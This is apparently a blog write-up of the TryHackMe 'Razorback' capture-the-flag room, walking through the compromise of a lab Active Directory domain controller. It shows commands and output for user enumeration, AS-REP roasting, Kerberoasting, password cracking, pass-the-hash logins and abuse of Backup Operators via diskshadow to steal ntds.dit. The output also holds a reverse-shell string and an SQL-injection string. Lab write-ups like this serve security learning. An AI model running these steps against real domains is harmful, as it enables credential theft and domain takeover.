C R E A T E & D E S T R OY

Razorback | TryHackMe

This room was really fun, I had to do a lot of reading and digging so got to learn a lot about Active Directory during the process.

53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-08-29 18:49:40Z)
111/tcp  open  rpcbind       2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: raz0rblack.thm, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
2049/tcp open  mountd        1-3 (RPC #100005)
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: raz0rblack.thm, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2022-08-29T18:50:36+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=HAVEN-DC.raz0rblack.thm
| Not valid before: 2022-08-28T18:48:06
|_Not valid after:  2023-02-27T18:48:06
| rdp-ntlm-info: 
|   Target_Name: RAZ0RBLACK
|   NetBIOS_Domain_Name: RAZ0RBLACK
|   NetBIOS_Computer_Name: HAVEN-DC
|   DNS_Domain_Name: raz0rblack.thm
|   DNS_Computer_Name: HAVEN-DC.raz0rblack.thm
|   Product_Version: 10.0.17763
|_  System_Time: 2022-08-29T18:50:27+00:00
Service Info: Host: HAVEN-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2022-08-29T18:50:29
|_  start_date: N/A
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required

Initial nmap results. Lots to go at. We can see the DNS name so first thing to do is add it to /etc/hosts.

We’ll start with the open NFS share and see what’s there.

showmount -e raz0rblack.thm                
Export list for raz0rblack.thm:
/users (everyone)

sudo mount -t nfs /mnt/users

sudo ls -la /mnt/users
total 17
drwx------ 2 nobody nogroup   64 Feb 27  2021 .
drwxr-xr-x 3 root   root    4096 Aug 29 20:30 ..
-rwx------ 1 nobody nogroup 9861 Feb 25  2021 employee_status.xlsx
-rwx------ 1 nobody nogroup   80 Feb 25  2021 sbradley.txt

Interestingly you can’t CD into folder (permission denied) but can sudo cp the files out to access them.

sbradley.txt contains another flag, and employee_status.xlsx contains a list of usernames we can enumerate.

daven port			TF PLAYER						
imogen royce		CTF PLAYER						
tamara vidal		CTF PLAYER						
arthur edwards		CTF PLAYER						
carl ingram			TF PLAYER (INACTIVE)						
nolan cassidy		CTF PLAYER						
reza zaydan			TF PLAYER						
rico delgado		WEB SPECIALIST						
tyson williams		REVERSE ENGINEERING						
steven bradley		STEGO SPECIALIST						
chamber lin			TF PLAYER(INACTIVE)	

I’m sure their roles aren’t so useful, but their names are. I can use a script from the CTF-Bash-Tools collection to create a list of usernames and run them through kerbrute against the box.

./kerbrute_linux_amd64 userenum -d raz0rblack.thm --dc  ~/Desktop/thm/raz0r/formatted_name_wordlist.txt

Kerbrute gives us 3 valid credentials.

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 08/29/22 - Ronnie Flathers @ropnop

2022/08/29 21:24:01 >  Using KDC(s):
2022/08/29 21:24:01 >

2022/08/29 21:24:02 >  [+] VALID USERNAME:       lvetrova@raz0rblack.thm
2022/08/29 21:24:02 >  [+] VALID USERNAME:       twilliams@raz0rblack.thm
2022/08/29 21:24:02 >  [+] VALID USERNAME:       sbradley@raz0rblack.thm
2022/08/29 21:24:02 >  Done! Tested 154 usernames (3 valid) in 1.060 seconds

I spent some time attempting to spray passwords with little luck so returned to the impacket suite to see what’s on offer.

We find GetNPUsers is able to dump AS REP hashes from incorrectly configured kerberos authentication.

python3 /opt/impacket/examples/GetNPUsers.py raz0rblack.thm/ -dc-ip -usersfile users -format hashcat -outputfile ~/Desktop/thm/raz0r/hashes.txt

Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[-] User sbradley doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User lvetrova doesn't have UF_DONT_REQUIRE_PREAUTH set

We’ll try with hashcat.

hashcat -m 18200 hashes.txt /usr/share/wordlists/rockyou.txt --force --show   

Since this was at the top of the rockyou.txt list, I thought I’d try bruteforce the other users in the list. Interestingly instead of a failed login message we get PASSWORD_MUST_CHANGE for the user sbradley

raz0rblack.thm\sbradley:roastpotatoes STATUS_PASSWORD_MUST_CHANGE

mbpasswd -r -U sbradley
Old SMB password:
New SMB password:
Retype new SMB password:
Password changed for user sbradley

We set the new password to Password! because that’s super secure.

This user has read access to a folder called trash in the SMB share so lets grab all the files and have a look.

smb: \> ls
  .                                   D        0  Tue Mar 16 06:01:28 2021
  ..                                  D        0  Tue Mar 16 06:01:28 2021
  chat_log_20210222143423.txt         A     1340  Thu Feb 25 19:29:05 2021
  experiment_gone_wrong.zip           A 18927164  Tue Mar 16 06:02:20 2021
  sbradley.txt                        A       37  Sat Feb 27 19:24:21 2021

                5101823 blocks of size 4096. 1003387 blocks available
smb: \> mget *

The zip file will contain the answer to one of the questions, so using zip2john we dump the hash to a file and crack it.

john zip.hash -w=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
electromagnetismo (experiment_gone_wrong.zip)     
1g 0:00:00:01 DONE (2022-08-31 21:08) 0.9345g/s 7832Kp/s 7832Kc/s 7832KC/s elieus..elboty2009
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

Opening the zip file gives a system.hive and NTDS.dit which dumps a huge file of hashes. We’ve creds for 2 of the 3 verified usernames so we can try all of the hashes on the user lvetrova using cackmapexec again. We can use awk to trim the file to the 4th colon (the NTLM hash) and output into a new file for CME.

awk -F : '{print $4}' ntds.txt > ntdshashes.txt
crackmapexec smb -u lvetrova -H ntdshashes.txt            
SMB     445    HAVEN-DC         [*] Windows 10.0 Build 17763 x64 (name:HAVEN-DC) (domain:raz0rblack.thm) (signing:True) (SMBv1
SMB     445    HAVEN-DC         [-] raz0rblack.thm\lvetrova:1afedc472d0fdfe07cd075d36804efd0 STATUS_LOGON_FAILURE 
SMB     445    HAVEN-DC         [-] raz0rblack.thm\lvetrova:7b8b14a73d8a45249de2f5b0c225d515 STATUS_LOGON_FAILURE 
SMB     445    HAVEN-DC         [-] raz0rblack.thm\lvetrova:081af9630677a387f6f0a9bb17852602 STATUS_LOGON_FAILURE 
SMB     445    HAVEN-DC         [-] raz0rblack.thm\lvetrova:c184a72ed800899bc1ff633778a89b5e STATUS_LOGON_FAILURE 
SMB     445    HAVEN-DC         [+] raz0rblack.thm\lvetrova:f220d3988deb3f516c73f40ee16c431d

This user also has RDP access and crackmapexec tells us we can Evil-WinRM to the box.

The file lvetrova.xml tells us “Your Flag Is Here” but no flag. After a lot of googling I come across some posts explaining how Active Directory can store secrets in XML files, which can be extracted with the following.

#First import the file as a variable to use.
$ss =import-clixml -Path lvetrova.xml
#Then output the list in a formatted form
$ss.GetNetworkCredential() | Format-List
#Which gives us the following...
UserName       : Your Flag is here =>
Password       : THM{694362e877adef0d85a92e6d17551fe4}
SecurePassword : System.Security.SecureString
Domain         :

While the crackmapexec was validating the hashes we were able to dump UserSPNs using an impacket script. With hashcat we get the username xyan1d3 and password cyanide9amine5628 which according to crackmapexec we can Evil-WinRM into also. The next question pertains to this user so let’s see where their flag is hidden.

This user has a similar XML file, which we can do exactly the same thing to obtain the flag.

Since we’re on an AD box, I’ll run Bloodhound and see if there’s any obvious mis-configurations to move laterally.

We can see that xyan1d3 is a member of backup operators which we can confirm in our Evil-WinRM shell.

*Evil-WinRM* PS C:\Users\xyan1d3\Documents> get-adgroupmember -identity "backup operators"

distinguishedName : CN=bash -i \>&. /dev/tcp/ 0\>&1,CN=Users,DC=raz0rblack,DC=thm
name              : bash -i >&. /dev/tcp/ 0>&1
objectClass       : user
objectGUID        : 89642a3b-44d6-47a8-abea-4b9135e45994
SamAccountName    : xyan1d3
SID               : S-1-5-21-3403444377-2687699443-13012745-1106

xyan1d3 doesn’t have access to the files in Administrator’s home folder but apparently we can use the function of a backup operator to obtain the ntds.dit and dump hashes. Because this is a live server ntds.dit is in use and we cannot do anything to it. We can use diskshadow to backup the live files and potentially access ntds.dit this way.

To do this, firstly create a script for diskshadow to run.

set verbose onX
set metadata C:\Windows\Temp\meta.cabX
set context clientaccessibleX
set context persistentX
begin backupX
add volume C: alias cdriveX
expose %cdrive% E:X
end backupX

Then pass the file to diskshadow.

diskshadow /s backup.txt                                                                                                
Microsoft DiskShadow version 1.0                                                                                                                  
Copyright (C) 2013 Microsoft Corporation                                                                                                          
On computer:  HAVEN-DC,  9/1/2022 2:04:45 AM                                                                                                      
-> set verbose on                                                                                                                                 
-> set metadata C:\Windows\Temp\meta.cab                                                                                                          
-> set context clientaccessible                                                                                                                   
-> set context persistent                                                                                                                         
-> begin backup                                                                                                                                   
-> add volume C: alias cdrive                                                                                                                     
-> create                                                                                                                                         
Excluding writer "Shadow Copy Optimization Writer", because all of its components have been excluded.                                             
Component "\BCD\BCD" from writer "ASR Writer" is excluded from backup,                                                                            
because it requires volume  which is not in the shadow copy set.          

Using robocopy, we can clone the backup ntds.

C:\files> robocopy /b E:\Windows\ntds . ntds.dit                                                                                  
   ROBOCOPY     ::     Robust File Copy for Windows                                                                                               
  Started : Thursday, September 1, 2022 2:10:28 AM                                                                                                
   Source : E:\Windows\ntds\                                                                                                                      
     Dest : C:\files\                                                                                                                             
    Files : ntds.dit                                                                                                                              
  Options : /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30                                                                                               
                           1    E:\Windows\ntds\                                                                                                  
            New File              16.0 m        ntds.dit       

Copying these to our Kali box with smbserver and dumping with secretsdump gives us another hash file. This time with a more reasonable and up to date list of users. With Evil-WinRM we can pass the Administrator hash and log in as Administrator.


The root.xml file doesn’t import in the same way the others did, and gives us a cryptographic error. After diving down another rabbit hole, I realise upon inspection of the xml file it was just hex encoded, so we can quickly retrieve the flag…

Look this is your cookie.
FunFact : This cookie can change its own flavour automatically. To test it just think of your favourite flavour.

And stop putting 'OR '1'='1 inside login.php

Enjoy your Cookie

Inside the cookie.json there’s a base64 encoded text of the above, so after a bunch of digging we find the folder “Top Secret” inside “C:\Program Files” containing the following PNG.

This gives us the answer to the last question. The way to save and exit vim. :wq

Leave a Reply

Your email address will not be published. Required fields are marked *